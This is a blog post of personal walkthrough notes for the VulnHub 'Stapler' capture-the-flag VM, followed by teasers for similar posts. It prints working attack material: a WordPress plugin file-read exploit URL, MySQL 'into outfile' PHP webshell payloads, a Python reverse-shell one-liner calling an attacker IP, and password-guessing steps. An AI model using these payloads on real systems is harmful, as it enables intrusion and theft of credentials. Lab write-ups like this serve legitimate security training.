Skip to main content

VM 26 - Stapler

Walkthru

  • https://github.com/Hamza-Megahed/CTFs/blob/master/stapler/README
  • https://www.vulnhub.com/entry/stapler-1,150/...long list of walkthru



===
1.       Shows many ports open
a.       Tcp : ftp, http, ssh, domain, netbios-ssn, doom, mysql, 12380. etc
b.       Udp : tftp, dns. Etc
2.       Surfing to the website at port 80 didn’t show much. Not dirb or nikto
3.       Tried to upload a file using tftp and accesses it via http://ip/newlyuploadedfile.php without any problem so creating a php reverse shell file and accessed it via http which gave shell access under www.
4.       Wget linuxprivchecker. Found shares and was able to connect to them using smbclient w/o pwd
5.       Looked around and see many user folder under /home.
6.       Spawn a TTY shell using [python -c 'import pty; pty.spawn("/bin/sh")'] which allowed us to use more command. use ls -laR | more to see the content of all the folders.
7.       Found “.sudo_as_admin_successful” under peter which was a hint but nothing in history file. The history file under JKanode folder actually had the pwd of peter. Use that pwd of peter and sudo su, use command [id] to check user access and switch as root and change the root pwd
$ find . -name ‘.bash_history’ -exec cat {} \;
Will search dir and subdirectories and print all bash history files
8.       There’s something running on 12380 so on a hunch I check that in the browser too. NMAP detail scan identifies it as HTTP Apache with httpd 2.4.18 and running Nikto on that port reveal new WordPress site. Shows robot.txt . found /blogblog/ site. Tried SQL injection which didn’t work. Looked in the blog and found plugins were installed recently. Looked father in searchsploit and advance video plugin vulnerability.
9.       https://www.exploit-db.com/exploits/39646/
a.       # POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]
10.    Changed the IP address, added port and the blogblog name. Also added /etc/passwd instead of FILEPATH
a.      

b.       When tried to access the URL , it would create a new blog with a pic. Looked at the source page of the blog and downloaded the pic using wget (use –no-check-certificate parameter to disable the https cert warning) and cat thru it and got output from doing  cat /etc/shadow. Now you have users. $cat 123.jpeg | grep /bin/bash | cut -d “:” -f1 (delimiter is : and show 1st field which are usernames)
11.   Now we have usrslist . need pwd. Use the https link above, lets try to access wp-config.php file. Replace /etc/passwd with the wp-config.php. Similarly it will generate a jpeg and you can download it using wget and cat to see content. Here you will see db user/pwd. Tried hydra with the userlist from previous jpeg and pwd from new jpeg and got in using zoe user. Login with zoe and look into other userhome folders and found sudo_as_admin_successful file under peter and peter pwd underJKanodes.
12.   Searchsploit told us that there is an exploit for wordpress advance video but when I edited the link and ran it, it gave me a cert mismatch warning [SSL: CERTIFICATE_VERIFY_FAILED]. So modified the exploit script. When you ran the script, no output is shown but blog is created.
13.   After the file is download, you will have db user/pwd. You will be logging into db and create webshell.
a.  mysql> select "<?php passthru($_GET['cmd']); ?>" into outfile '/var/www/https/blogblog/wp-content/uploads/sh.php';
               Query OK, 1 row affected (0.03 sec)
b.  curl -k -s https://$ip:12380/blogblog/wp-content/uploads/sh.php?c=uname+-a or use browser but nothing comes back..On another side it is cmd and c…none of the meterpreter stuff is working with c.
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
c.  create meterpreter and start multi handler
d.  use the webshell to download and execute the meterpreter
e.  once access to the machine, look around in all the user folders

14.    you can inject php shell here
$ mysql> Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";
15.   then you can use it
https://192.168.190.131:12380/blogblog/wp-content/uploads/shell.php?cmd=pwd
which will show output on the browser
16.   now on kali machine
$ nc -lvp 80
17.   and from the php shell  append to the URL.  If you have the NC running, this will get you sheell
?cmd=python%20-c%20'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.190.1",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

                           



Comments

Post a Comment

Popular posts from this blog

VM 13 : Basic Pentest 1 csec

Notes: Walkthru: 1. https://medium.com/@evire/basic-pentesting-1-7251fb3e3f9e [ w/metasploi t using Wordpress t] 2. https://prasannakumar.in/infosec/vulnhub-basic-pentesting-1-writeup/ [ w/metasploit using ftp ] 3.  https://www.ceos3c.com/hacking/basic-pentesting-1-walkthrough/ [ by uploading php-reverse-shell in wordpress ] 4. http://k3ramas.blogspot.com/2018/02/basic-pentesting-1-walkthrough.html [  access wordpress config file to get pwd and access the DB ] 5.  https://cowsayroot.com/walkthrough-basic-pentesting-1/ [ Wpscan, ftp metasploit vulnerability, phpbash ] 6.   http://www.hackingarticles.in/hack-the-basic-penetration-vm-boot2root-challenge/    [use msfvenom to create  to create php shell to be uploaded in Wordpress ] 7.   https://d7x.promiselabs.net/2018/01/30/ctf-basic-pentesting-a-guide-for-beginners/ [adding command using using PHP] Notes:  Ports - 21...ProFTPD 1.3.3c - 22 openSSH 7.2p2 ubuntu ...
2 comments
Read more

VM 9 : PHP Include And Post Exploitation

Walkthrough 1.        https://medium.com/@Kan1shka9/pentesterlab-php-include-and-post-exploitation-walkthrough-8a85bcfa7b1d 2.        Ine [] 3.        http://megwhite.com.au/pentester-lab-bootcamp-walkthrough-php-include-post-exploitation/ 4.        http://fallensnow-jack.blogspot.com/2014/07/pentester-lab-php-lfi-post-exploitation.html Notes: root@kali:~# nmap 10.0.0.12 Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-30 12:23 EDT Nmap scan report for 10.0.0.12 Host is up (0.00035s latency). Not shown: 999 filtered ports PORT    STATE SERVICE 80/tcp open   http MAC Address: 08:00:27:1F:12:24 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds root@kali:~# Enumerating port 80 Run dirb root@kali:~# dirb http://10.0.0.12/ ----------------- DIRB v2.22 By The Dark Raver...
1 comment
Read more

VM 5: Vulnix :

Walkthru: A. https://mrh4sh.github.io/vulnix-solution [SMTP and Finger enumeration, creating linux user with specific UID, root squashing, ssh pwd cracking using medusa & hydra, logging using ssh keys, updating /usr/sbin/exportfs] B. http://overflowsecurity.com/hacklab-vulnix/ [ same as above. create ssh keys for root and copied to victim to login as root w/o recovering pwd] C. https://www.rebootuser.com/?p=988[ local bash shell from nfs] B. https://www.vulnhub.com/?q=vulnix&sort=date-des&type=vm [list of solutions] D. https://www.rebootuser.com/?p=988 [User Enumeration #1 – SMTP, Finger; Entry Point including hydra, Putty(using rlogin service), nfs (showmount,mount) ] Notes: - As you can see the root user is the only account which is logged on the remote  host.Now that we have a specific username we can use it in order to obtain more information about this user with the command  finger root@host . -  Another effective use of the finger...
Post a Comment
Read more